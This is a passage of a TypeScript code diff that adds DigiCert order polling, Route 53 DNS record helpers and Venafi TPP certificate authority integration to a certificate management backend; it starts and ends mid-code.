status: CertificateRequestStatus.FAILED, orderStatus: "timeout", reason: "timeout" }; + } + + const client = await getOrCreateClient(request, deps, clientCache); + + const orderInfo = await client.getOrder(parsed.digicert.orderId); + let orderStatus = orderInfo.status?.toLowerCase() ?? "unknown"; + let newCertificateId = orderInfo.certificate?.id ?? parsed.digicert.certificateId; + let lastCheckStatus: string | undefined; + + if (orderStatus === DigiCertOrderStatus.Pending) { + const checkResult = await client.checkValidation(parsed.digicert.orderId); + orderStatus = checkResult.order_status?.toLowerCase() ?? orderStatus; + newCertificateId = checkResult.certificate_id ?? newCertificateId; + lastCheckStatus = checkResult.dcv_status ?? orderStatus; + } + + const isFinalisable = DIGICERT_FINAL_ISSUED_STATUSES.some((status) => status === orderStatus); + if (isFinalisable && newCertificateId) { + const { certificateId } = await deps.digicertFns.fetchAndAttachIssuedCertificate({ + caId: request.caId, + certificateRequest: { + id: request.id, + profileId: request.profileId, + commonName: request.commonName, + altNames: (request.altNames as string | null) ?? null, + keyUsages: request.keyUsages, + extendedKeyUsages: request.extendedKeyUsages, + keyAlgorithm: request.keyAlgorithm, + signatureAlgorithm: request.signatureAlgorithm + }, + digicertCertificateId: newCertificateId, + digicertOrderId: parsed.digicert.orderId, + encryptedPrivateKey: request.encryptedPrivateKey ?? undefined, + isRenewal: parsed.digicert.isRenewal, + originalCertificateId: parsed.digicert.originalCertificateId + }); + + await deps.certificateRequestService.attachCertificateToRequest({ + certificateRequestId: request.id, + certificateId + }); + await copyMetadataFromRequestToCertificate(deps.resourceMetadataDAL, { + certificateRequestId: request.id, + certificateId + }); + logger.info( + `DigiCert order issued, attached certificate [certificateRequestId=${request.id}] [certificateId=${certificateId}]` + ); + return { status: CertificateRequestStatus.ISSUED, certificateId, orderStatus }; + } + + if ( + orderStatus === DigiCertOrderStatus.Rejected || + orderStatus === DigiCertOrderStatus.Canceled || + orderStatus === DigiCertOrderStatus.Expired || + orderStatus === DigiCertOrderStatus.Revoked + ) { + await deps.certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId: request.id, + status: CertificateRequestStatus.FAILED, + errorMessage: `DigiCert order ${orderStatus}` + }); + logger.info(`DigiCert order terminal state [certificateRequestId=${request.id}] [status=${orderStatus}]`); + return { + status: CertificateRequestStatus.FAILED, + orderStatus, + reason: `DigiCert order ${orderStatus}` + }; + } + + await deps.certificateRequestDAL.updateById(request.id, { + metadata: JSON.stringify({ + ...parsed, + digicert: { + ...parsed.digicert, + lastCheckedAt: new Date().toISOString(), + lastCheckStatus: lastCheckStatus ?? orderStatus + } + }) + }); + + return { status: CertificateRequestStatus.PENDING_VALIDATION, orderStatus }; +}; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-queue.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-queue.ts new file mode 100644 index 00000000000..5dc38586983 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-queue.ts @@ -0,0 +1,99 @@ +/* eslint-disable no-await-in-loop */ +import { getConfig } from "@app/lib/config/env"; +import { logger } from "@app/lib/logger"; +import { JOB_SCHEDULER_PREFIX, QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; + +import { CertificateRequestStatus } from "../../certificate-common/certificate-constants"; +import { TCertificateRequestDALFactory } from "../../certificate-request/certificate-request-dal"; +import { CaType } from "../certificate-authority-enums"; +import { TDigiCertApiClient } from "./digicert-api-client"; +import { + processDigiCertPendingValidationRequest, + TProcessDigiCertRequestDeps +} from "./digicert-certificate-authority-processor"; + +const DIGICERT_POLL_CRON_SCHEDULE = "0 * * * *"; +const QUEUE_BATCH_SIZE = 50; + +type TDigiCertCertificateAuthorityQueueServiceFactoryDep = Omit< + TProcessDigiCertRequestDeps, + "certificateRequestDAL" +> & { + queueService: TQueueServiceFactory; + certificateRequestDAL: Pick; +}; + +export type TDigiCertCertificateAuthorityQueueServiceFactory = ReturnType< + typeof digicertCertificateAuthorityQueueServiceFactory +>; + +export const digicertCertificateAuthorityQueueServiceFactory = ({ + queueService, + ...processorDeps +}: TDigiCertCertificateAuthorityQueueServiceFactoryDep) => { + const appCfg = getConfig(); + + const init = async () => { + if (appCfg.isSecondaryInstance) { + return; + } + + queueService.start(QueueName.DigiCertOrderPolling, async () => { + try { + logger.info(`${QueueJobs.DigiCertOrderPolling}: queue task started`); + + const clientsByCaId = new Map(); + let processed = 0; + let issued = 0; + let failed = 0; + + let cursor: Date | undefined; + let hasMore = true; + while (hasMore) { + const requests = await processorDeps.certificateRequestDAL.findPendingValidationByCaType(CaType.DIGICERT, { + limit: QUEUE_BATCH_SIZE, + afterCreatedAt: cursor + }); + + if (requests.length === 0) break; + + for (const request of requests) { + processed += 1; + try { + const result = await processDigiCertPendingValidationRequest(processorDeps, request, clientsByCaId); + if (result.status === CertificateRequestStatus.ISSUED) issued += 1; + if (result.status === CertificateRequestStatus.FAILED) failed += 1; + } catch (error) { + logger.error(error, `DigiCert polling iteration failed [certificateRequestId=${request.id}]`); + } + } + + cursor = new Date(requests[requests.length - 1].createdAt); + hasMore = requests.length === QUEUE_BATCH_SIZE; + } + + logger.info( + `${QueueJobs.DigiCertOrderPolling}: completed [processed=${processed}] [issued=${issued}] [failed=${failed}]` + ); + } catch (error) { + logger.error(error, `${QueueJobs.DigiCertOrderPolling}: polling task failed`); + throw error; + } + }); + + await queueService.upsertJobScheduler( + QueueName.DigiCertOrderPolling, + `${JOB_SCHEDULER_PREFIX}:${QueueJobs.DigiCertOrderPolling}`, + { pattern: DIGICERT_POLL_CRON_SCHEDULE }, + { name: QueueJobs.DigiCertOrderPolling } + ); + + queueService.listen(QueueName.DigiCertOrderPolling, "failed", (_, err) => { + logger.error(err, `${QueueName.DigiCertOrderPolling}: failed`); + }); + }; + + return { + init + }; +}; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-schemas.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-schemas.ts new file mode 100644 index 00000000000..462b9dab429 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-schemas.ts @@ -0,0 +1,55 @@ +import { z } from "zod"; + +import { CaType } from "../certificate-authority-enums"; +import { + BaseCertificateAuthoritySchema, + GenericCreateCertificateAuthorityFieldsSchema, + GenericUpdateCertificateAuthorityFieldsSchema +} from "../certificate-authority-schemas"; + +export const DigiCertCertificateAuthorityConfigurationSchema = z.object({ + appConnectionId: z.string().uuid().trim().describe("DigiCert App Connection ID"), + organizationId: z + .number() + .int() + .positive() + .describe("CertCentral Organization ID that will be listed on issued certificates"), + productNameId: z + .string() + .trim() + .min(1) + .describe( + "The DigiCert product name_id used for issuance (e.g. ssl_plus, ssl_ev_plus). Fetch available products from GET /app-connections/digicert/:id/products." + ) +}); + +export const DigiCertCertificateAuthoritySchema = BaseCertificateAuthoritySchema.extend({ + type: z.literal(CaType.DIGICERT), + configuration: DigiCertCertificateAuthorityConfigurationSchema +}); + +export const CreateDigiCertCertificateAuthoritySchema = GenericCreateCertificateAuthorityFieldsSchema( + CaType.DIGICERT +).extend({ + configuration: DigiCertCertificateAuthorityConfigurationSchema +}); + +export const UpdateDigiCertCertificateAuthoritySchema = GenericUpdateCertificateAuthorityFieldsSchema( + CaType.DIGICERT +).extend({ + configuration: DigiCertCertificateAuthorityConfigurationSchema.optional() +}); + +export const DigiCertCertificateRequestMetadataSchema = z.object({ + digicert: z.object({ + orderId: z.number().int(), + certificateId: z.number().int().optional(), + productNameId: z.string(), + organizationId: z.number().int(), + orderPlacedAt: z.string(), + lastCheckedAt: z.string().optional(), + lastCheckStatus: z.string().optional(), + isRenewal: z.boolean().optional(), + originalCertificateId: z.string().uuid().optional() + }) +}); diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-types.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-types.ts new file mode 100644 index 00000000000..dcafe46db67 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-types.ts @@ -0,0 +1,16 @@ +import { z } from "zod"; + +import { + CreateDigiCertCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + DigiCertCertificateRequestMetadataSchema, + UpdateDigiCertCertificateAuthoritySchema +} from "./digicert-certificate-authority-schemas"; + +export type TDigiCertCertificateAuthority = z.infer; + +export type TCreateDigiCertCertificateAuthorityDTO = z.infer; + +export type TUpdateDigiCertCertificateAuthorityDTO = z.infer; + +export type TDigiCertCertificateRequestMetadata = z.infer; diff --git a/backend/src/services/certificate-authority/dns-providers/route53.ts b/backend/src/services/certificate-authority/dns-providers/route53.ts new file mode 100644 index 00000000000..cb14c242dce --- /dev/null +++ b/backend/src/services/certificate-authority/dns-providers/route53.ts @@ -0,0 +1,66 @@ +import { ChangeResourceRecordSetsCommand, GetHostedZoneCommand, Route53Client } from "@aws-sdk/client-route-53"; + +import { CustomAWSHasher } from "@app/lib/aws/hashing"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; +import { TAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-types"; + +export type TRoute53Record = { + name: string; + type: "CNAME" | "TXT" | "A" | "AAAA"; + value: string; + ttl?: number; + comment?: string; +}; + +const buildClient = async (connection: TAwsConnectionConfig) => { + // Route 53 is a global service β€” the region passed here only affects the signer, not the data plane. + // us-east-1 is AWS's canonical region for global services. + const config = await getAwsConnectionConfig(connection, AWSRegion.US_EAST_1); + return new Route53Client({ + sha256: CustomAWSHasher, + useFipsEndpoint: crypto.isFipsModeEnabled(), + credentials: config.credentials, + region: config.region + }); +}; + +const changeRecord = async ( + connection: TAwsConnectionConfig, + hostedZoneId: string, + action: "UPSERT" | "DELETE", + record: TRoute53Record +) => { + const route53Client = await buildClient(connection); + const defaultComment = `${action === "UPSERT" ? "Upsert" : "Delete"} ${record.type} record for ${record.name}`; + const command = new ChangeResourceRecordSetsCommand({ + HostedZoneId: hostedZoneId, + ChangeBatch: { + Comment: record.comment ?? defaultComment, + Changes: [ + { + Action: action, + ResourceRecordSet: { + Name: record.name, + Type: record.type, + TTL: record.ttl ?? 300, + ResourceRecords: [{ Value: record.value }] + } + } + ] + } + }); + await route53Client.send(command); +}; + +export const route53UpsertRecord = (connection: TAwsConnectionConfig, hostedZoneId: string, record: TRoute53Record) => + changeRecord(connection, hostedZoneId, "UPSERT", record); + +export const route53DeleteRecord = (connection: TAwsConnectionConfig, hostedZoneId: string, record: TRoute53Record) => + changeRecord(connection, hostedZoneId, "DELETE", record); + +export const route53GetHostedZone = async (connection: TAwsConnectionConfig, hostedZoneId: string) => { + const route53Client = await buildClient(connection); + await route53Client.send(new GetHostedZoneCommand({ Id: hostedZoneId })); +}; diff --git a/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-fns.ts b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-fns.ts new file mode 100644 index 00000000000..b8fabb7283a --- /dev/null +++ b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-fns.ts @@ -0,0 +1,950 @@ +/* eslint-disable no-await-in-loop */ +import * as x509 from "@peculiar/x509"; +import { AxiosError } from "axios"; +import RE2 from "re2"; + +import { TableName } from "@app/db/schemas"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnectionCredentials } from "@app/services/app-connection/app-connection-fns"; +import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; +import { + authenticateVenafiTpp, + getVenafiTppHeaders, + requestWithVenafiTppGateway, + revokeVenafiTppToken +} from "@app/services/app-connection/venafi-tpp/venafi-tpp-connection-fns"; +import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; +import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; +import { + CertExtendedKeyUsage, + CertKeyAlgorithm, + CertKeyUsage, + CertStatus, + CertSubjectAlternativeNameType, + mapSanTypeToX509Type +} from "@app/services/certificate/certificate-types"; +import { calculateRenewalThreshold, parseTtlToDays } from "@app/services/certificate-common/certificate-issuance-utils"; +import { TCertificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns"; + +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { CaStatus, CaType } from "../certificate-authority-enums"; +import { keyAlgorithmToAlgCfg } from "../certificate-authority-fns"; +import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; +import { + TCreateVenafiTppCertificateAuthorityDTO, + TUpdateVenafiTppCertificateAuthorityDTO, + TVenafiTppCertificateAuthority +} from "./venafi-tpp-certificate-authority-types"; + +// -- SAN type codes for Venafi TPP SubjectAltNames -- +const VENAFI_SAN_TYPE_BY_SAN_TYPE: Record = { + [CertSubjectAlternativeNameType.DNS_NAME]: 2, + [CertSubjectAlternativeNameType.IP_ADDRESS]: 7, + [CertSubjectAlternativeNameType.EMAIL]: 1, + [CertSubjectAlternativeNameType.URI]: 6 +}; + +type TVenafiTppCertificateRequest = { + PolicyDN: string; + PKCS10: string; + ObjectName: string; + SubjectAltNames?: Array<{ Type: number; Name: string }>; + Origin?: string; + CASpecificAttributes?: Array<{ Name: string; Value: string }>; + WorkToDoTimeout?: number; + DisableAutomaticRenewal?: boolean; +}; + +type TVenafiTppRequestResponse = { + CertificateDN: string; + Guid: string; + CertificateData?: string; + Filename?: string; + Format?: string; +}; + +type TVenafiTppRetrieveResponse = { + CertificateData: string; + Filename: string; + Format: string; +}; + +const calculateFinalRenewBeforeDays = ( + profile: { apiConfig?: { autoRenew?: boolean; renewBeforeDays?: number } } | undefined, + ttl: string +): number | undefined => { + if (!profile?.apiConfig?.autoRenew) { + return undefined; + } + + const profileRenewBeforeDays = profile.apiConfig.renewBeforeDays; + if (profileRenewBeforeDays === undefined) { + return undefined; + } + + return calculateRenewalThreshold(profileRenewBeforeDays, parseTtlToDays(ttl)); +}; + +const normalizeTppUrl = (tppUrl: string): string => { + return tppUrl.replace(new RE2("\\/+$"), ""); +}; + +const sanToVenafiFormat = (san: { + type: CertSubjectAlternativeNameType; + value: string; +}): { + Type: number; + Name: string; +} => ({ + Type: VENAFI_SAN_TYPE_BY_SAN_TYPE[san.type], + Name: san.value +}); + +const getVenafiTppConnection = async ( + appConnectionId: string, + appConnectionDAL: Pick, + kmsService: Pick +) => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + logger.error({ appConnectionId }, "Venafi TPP: App connection not found for credential decryption"); + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + + if (appConnection.app !== AppConnection.VenafiTpp) { + logger.error( + { appConnectionId, actualApp: appConnection.app }, + "Venafi TPP: App connection is not a Venafi TPP connection" + ); + throw new BadRequestError({ + message: `Connection with ID '${appConnectionId}' is not a Venafi TPP connection` + }); + } + + if (!appConnection.encryptedCredentials) { + logger.error({ appConnectionId }, "Venafi TPP: App connection has no encrypted credentials"); + throw new BadRequestError({ message: "App connection has no stored credentials" }); + } + + const credentials = (await decryptAppConnectionCredentials({ + orgId: appConnection.orgId, + kmsService, + encryptedCredentials: appConnection.encryptedCredentials, + projectId: appConnection.projectId + })) as { + tppUrl: string; + clientId: string; + username: string; + password: string; + }; + + return { credentials, gatewayId: appConnection.gatewayId ?? null }; +}; + +const submitCertificateToTpp = async ({ + appConnection, + baseUrl, + accessToken, + policyDN, + csrPem, + objectName, + altNames, + workToDoTimeout = 30, + gatewayV2Service +}: { + appConnection: { gatewayId?: string | null }; + baseUrl: string; + accessToken: string; + policyDN: string; + csrPem: string; + objectName: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + workToDoTimeout?: number; + gatewayV2Service: Pick; +}): Promise => { + const requestBody: TVenafiTppCertificateRequest = { + PolicyDN: policyDN, + PKCS10: csrPem, + ObjectName: objectName, + Origin: "Infisical", + DisableAutomaticRenewal: true, + WorkToDoTimeout: workToDoTimeout + }; + + if (altNames && altNames.length > 0) { + requestBody.SubjectAltNames = altNames.map(sanToVenafiFormat); + } + + logger.info( + { + policyDN, + objectName, + sanCount: requestBody.SubjectAltNames?.length ?? 0 + }, + "Venafi TPP: Submitting certificate request" + ); + + const { data, status } = await requestWithVenafiTppGateway( + appConnection, + gatewayV2Service, + { + method: "POST", + url: `${baseUrl}/vedsdk/certificates/request`, + data: requestBody, + headers: getVenafiTppHeaders(accessToken), + validateStatus: (s) => s === 200 || s === 202 + } + ); + + logger.info( + { + certificateDN: data.CertificateDN, + guid: data.Guid, + httpStatus: status, + hasCertificateData: !!data.CertificateData + }, + "Venafi TPP: Certificate request submitted" + ); + + return data; +}; + +const retrieveCertificateFromTpp = async ({ + appConnection, + baseUrl, + accessToken, + certificateDN, + includeChain = true, + gatewayV2Service +}: { + appConnection: { gatewayId?: string | null }; + baseUrl: string; + accessToken: string; + certificateDN: string; + includeChain?: boolean; + gatewayV2Service: Pick; +}): Promise<{ certificate: string; chain: string }> => { + logger.info({ certificateDN, includeChain }, "Venafi TPP: Retrieving certificate"); + + const { data, status } = await requestWithVenafiTppGateway( + appConnection, + gatewayV2Service, + { + method: "POST", + url: `${baseUrl}/vedsdk/certificates/retrieve`, + data: { + CertificateDN: certificateDN, + Format: "Base64", + IncludeChain: includeChain, + IncludePrivateKey: false, + RootFirstOrder: false + }, + headers: getVenafiTppHeaders(accessToken), + validateStatus: (s) => s === 200 || s === 202 + } + ); + + if (status === 202) { + logger.info({ certificateDN }, "Venafi TPP: Certificate not yet ready (202 Accepted)"); + throw new BadRequestError({ + message: "Certificate is not yet ready for retrieval. It may still be pending processing or approval." + }); + } + + if (!data.CertificateData) { + throw new BadRequestError({ message: "Venafi TPP returned empty certificate data" }); + } + + const decodedData = Buffer.from(data.CertificateData, "base64").toString("utf8"); + + const certBlocks = decodedData.match(new RE2("-----BEGIN CERTIFICATE-----[\\s\\S]*?-----END CERTIFICATE-----", "g")); + + if (!certBlocks || certBlocks.length === 0) { + throw new BadRequestError({ message: "Failed to parse certificate data from Venafi TPP response" }); + } + + const leafCert = certBlocks[0]; + const chainCerts = certBlocks.length > 1 ? certBlocks.slice(1).join("\n") : ""; + + logger.info( + { + certificateDN, + chainCertCount: certBlocks.length - 1 + }, + "Venafi TPP: Certificate retrieved successfully" + ); + + return { + certificate: leafCert, + chain: chainCerts + }; +}; + +export const castDbEntryToVenafiTppCertificateAuthority = ( + ca: Awaited> +): TVenafiTppCertificateAuthority & { credentials: Buffer | null | undefined } => { + if (!ca.externalCa?.id) { + throw new BadRequestError({ message: "Malformed Venafi TPP certificate authority" }); + } + + if (!ca.externalCa.appConnectionId) { + throw new BadRequestError({ + message: "Venafi TPP app connection ID is missing from certificate authority configuration" + }); + } + + const configuration = ca.externalCa.configuration as { policyDN?: string } | null; + + if (!configuration?.policyDN) { + throw new BadRequestError({ + message: "Venafi TPP policy DN is missing from certificate authority configuration" + }); + } + + return { + id: ca.id, + type: CaType.VENAFI_TPP, + enableDirectIssuance: ca.enableDirectIssuance, + name: ca.name, + projectId: ca.projectId, + credentials: ca.externalCa.credentials, + configuration: { + appConnectionId: ca.externalCa.appConnectionId, + policyDN: configuration.policyDN + }, + status: ca.status as CaStatus + }; +}; + +type TVenafiTppCertificateAuthorityFnsDeps = { + appConnectionDAL: Pick; + appConnectionService: Pick; + certificateAuthorityDAL: Pick< + TCertificateAuthorityDALFactory, + "create" | "transaction" | "findByIdWithAssociatedCa" | "updateById" | "findWithAssociatedCa" | "findById" + >; + externalCertificateAuthorityDAL: Pick; + certificateDAL: Pick; + certificateBodyDAL: Pick; + certificateSecretDAL: Pick; + kmsService: Pick; + projectDAL: Pick; + certificateProfileDAL?: Pick; + gatewayV2Service: Pick; +}; + +export const VenafiTppCertificateAuthorityFns = ({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL, + gatewayV2Service +}: TVenafiTppCertificateAuthorityFnsDeps) => { + const createCertificateAuthority = async ({ + name, + projectId, + configuration, + actor, + status + }: { + status: CaStatus; + name: string; + projectId: string; + configuration: TCreateVenafiTppCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + }) => { + const { appConnectionId, policyDN } = configuration; + const appConnection = await appConnectionDAL.findById(appConnectionId); + + if (!appConnection) { + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + + if (appConnection.app !== AppConnection.VenafiTpp) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not a Venafi TPP connection` + }); + } + + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: appConnectionId, projectId }, + actor + ); + + logger.info({ projectId, appConnectionId, policyDN }, "Venafi TPP: Creating certificate authority"); + + const caEntity = await certificateAuthorityDAL.transaction(async (tx) => { + try { + const ca = await certificateAuthorityDAL.create( + { + projectId, + enableDirectIssuance: false, + name, + status + }, + tx + ); + + await externalCertificateAuthorityDAL.create( + { + caId: ca.id, + appConnectionId, + type: CaType.VENAFI_TPP, + configuration: { policyDN } + }, + tx + ); + + return await certificateAuthorityDAL.findByIdWithAssociatedCa(ca.id, tx); + } catch (error) { + // 23505 = unique constraint violation + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access, @typescript-eslint/no-explicit-any + if ((error as any)?.error?.code === "23505") { + throw new BadRequestError({ + message: "Certificate authority with the same name already exists in your project" + }); + } + throw error; + } + }); + + if (!caEntity.externalCa?.id) { + throw new BadRequestError({ message: "Failed to create Venafi TPP certificate authority" }); + } + + logger.info({ caId: caEntity.id, projectId }, "Venafi TPP: Certificate authority created successfully"); + + return castDbEntryToVenafiTppCertificateAuthority(caEntity); + }; + + const updateCertificateAuthority = async ({ + id, + configuration, + actor, + status, + name + }: { + id: string; + configuration?: TUpdateVenafiTppCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + status?: CaStatus; + name?: string; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(id); + if (!ca || !ca.externalCa) { + throw new NotFoundError({ message: `Certificate authority with ID '${id}' not found` }); + } + + const updatedCa = await certificateAuthorityDAL.transaction(async (tx) => { + if (configuration) { + if (configuration.appConnectionId) { + const appConnection = await appConnectionDAL.findById(configuration.appConnectionId); + if (!appConnection) { + throw new NotFoundError({ + message: `App connection with ID '${configuration.appConnectionId}' not found` + }); + } + if (appConnection.app !== AppConnection.VenafiTpp) { + throw new BadRequestError({ + message: `App connection with ID '${configuration.appConnectionId}' is not a Venafi TPP connection` + }); + } + + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: configuration.appConnectionId, projectId: ca.projectId }, + actor + ); + } + + const existingConfig = (ca.externalCa?.configuration as { policyDN?: string } | null) || {}; + await externalCertificateAuthorityDAL.update( + { caId: id, type: CaType.VENAFI_TPP }, + { + ...(configuration.appConnectionId && { appConnectionId: configuration.appConnectionId }), + configuration: { + ...existingConfig, + ...(configuration.policyDN && { policyDN: configuration.policyDN }) + } + }, + tx + ); + } + + if (name || status) { + await certificateAuthorityDAL.updateById( + id, + { + name, + status + }, + tx + ); + } + + return certificateAuthorityDAL.findByIdWithAssociatedCa(id, tx); + }); + + if (!updatedCa.externalCa?.id) { + throw new BadRequestError({ message: "Failed to update Venafi TPP certificate authority" }); + } + + return castDbEntryToVenafiTppCertificateAuthority(updatedCa); + }; + + const listCertificateAuthorities = async ({ + projectId, + permissionFilters + }: { + projectId: string; + permissionFilters?: ProcessedPermissionRules; + }) => { + const cas = await certificateAuthorityDAL.findWithAssociatedCa( + { + [`${TableName.CertificateAuthority}.projectId` as "projectId"]: projectId, + [`${TableName.ExternalCertificateAuthority}.type` as "type"]: CaType.VENAFI_TPP + }, + {}, + permissionFilters + ); + + return cas.map(castDbEntryToVenafiTppCertificateAuthority); + }; + + const orderCertificateFromProfile = async ({ + caId, + profileId, + commonName, + altNames = [], + keyUsages = [], + extendedKeyUsages = [], + validity, + signatureAlgorithm, + keyAlgorithm = CertKeyAlgorithm.RSA_2048, + isRenewal, + originalCertificateId, + csr, + organization, + organizationalUnit, + country, + state, + locality + }: { + caId: string; + profileId: string; + commonName: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + keyUsages?: CertKeyUsage[]; + extendedKeyUsages?: CertExtendedKeyUsage[]; + validity: { ttl: string }; + signatureAlgorithm?: string; + keyAlgorithm?: CertKeyAlgorithm; + isRenewal?: boolean; + originalCertificateId?: string; + csr?: string; + organization?: string; + organizationalUnit?: string; + country?: string; + state?: string; + locality?: string; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.VENAFI_TPP) { + logger.error( + { caId, externalCaType: ca.externalCa?.type }, + "Venafi TPP: CA is not a Venafi TPP certificate authority" + ); + throw new BadRequestError({ message: "CA is not a Venafi TPP certificate authority" }); + } + + const venafiCa = castDbEntryToVenafiTppCertificateAuthority(ca); + if (venafiCa.status !== CaStatus.ACTIVE) { + logger.error({ caId, status: venafiCa.status }, "Venafi TPP: Certificate authority is disabled"); + throw new BadRequestError({ message: "Certificate authority is disabled" }); + } + + logger.info( + { + caId, + profileId, + commonName, + policyDN: venafiCa.configuration.policyDN, + altNameCount: altNames.length + }, + "Venafi TPP: Starting certificate order from profile" + ); + + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + + const kmsEncryptor = await kmsService.encryptWithKmsKey({ + kmsId: certificateManagerKmsId + }); + + const { credentials, gatewayId } = await getVenafiTppConnection( + venafiCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + + const baseUrl = normalizeTppUrl(credentials.tppUrl); + const appConnection = { gatewayId }; + + let csrPem: string; + let skLeaf: string | undefined; + + if (csr) { + csrPem = csr; + skLeaf = undefined; + logger.info({ caId, commonName }, "Venafi TPP: Using user-provided CSR"); + } else { + let alg; + if (signatureAlgorithm) { + switch (signatureAlgorithm.toUpperCase()) { + case "RSA-SHA256": + case "SHA256WITHRSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048); + break; + case "RSA-SHA384": + case "SHA384WITHRSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_3072); + break; + case "RSA-SHA512": + case "SHA512WITHRSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_4096); + break; + case "ECDSA-SHA256": + case "SHA256WITHECDSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.ECDSA_P256); + break; + case "ECDSA-SHA384": + case "SHA384WITHECDSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.ECDSA_P384); + break; + case "ECDSA-SHA512": + case "SHA512WITHECDSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.ECDSA_P521); + break; + default: + alg = keyAlgorithmToAlgCfg(keyAlgorithm); + break; + } + } else { + alg = keyAlgorithmToAlgCfg(keyAlgorithm); + } + + const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); + const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey); + skLeaf = skLeafObj.export({ format: "pem", type: "pkcs8" }) as string; + + const dnParts: string[] = [`CN=${commonName}`]; + if (organization) dnParts.push(`O=${organization}`); + if (organizationalUnit) dnParts.push(`OU=${organizationalUnit}`); + if (locality) dnParts.push(`L=${locality}`); + if (state) dnParts.push(`ST=${state}`); + if (country) dnParts.push(`C=${country}`); + const subjectDN = dnParts.join(", "); + + const sanExtensions: x509.SubjectAlternativeNameExtension[] = []; + if (altNames.length > 0) { + sanExtensions.push( + new x509.SubjectAlternativeNameExtension( + altNames.map((san) => ({ type: mapSanTypeToX509Type(san.type), value: san.value })), + false + ) + ); + } + + const csrObj = await x509.Pkcs10CertificateRequestGenerator.create({ + name: subjectDN, + keys: leafKeys, + signingAlgorithm: alg, + ...(sanExtensions.length > 0 && { extensions: sanExtensions }) + }); + + csrPem = csrObj.toString("pem"); + } + + let accessToken: string | undefined; + + try { + const authResponse = await authenticateVenafiTpp({ gatewayId, credentials }, gatewayV2Service); + accessToken = authResponse.access_token; + + const requestResponse = await submitCertificateToTpp({ + appConnection, + baseUrl, + accessToken, + policyDN: venafiCa.configuration.policyDN, + csrPem, + objectName: commonName, + altNames, + workToDoTimeout: 60, + gatewayV2Service + }); + + let certificateResult: { certificate: string; chain: string } | undefined; + + if (requestResponse.CertificateData) { + const decodedData = Buffer.from(requestResponse.CertificateData, "base64").toString("utf8"); + const certBlocks = decodedData.match( + new RE2("-----BEGIN CERTIFICATE-----[\\s\\S]*?-----END CERTIFICATE-----", "g") + ); + + if (certBlocks && certBlocks.length > 0) { + certificateResult = { + certificate: certBlocks[0], + chain: certBlocks.length > 1 ? certBlocks.slice(1).join("\n") : "" + }; + } + } + + if (!certificateResult) { + const maxRetries = 10; + const initialDelay = 3000; + let lastError: Error | null = 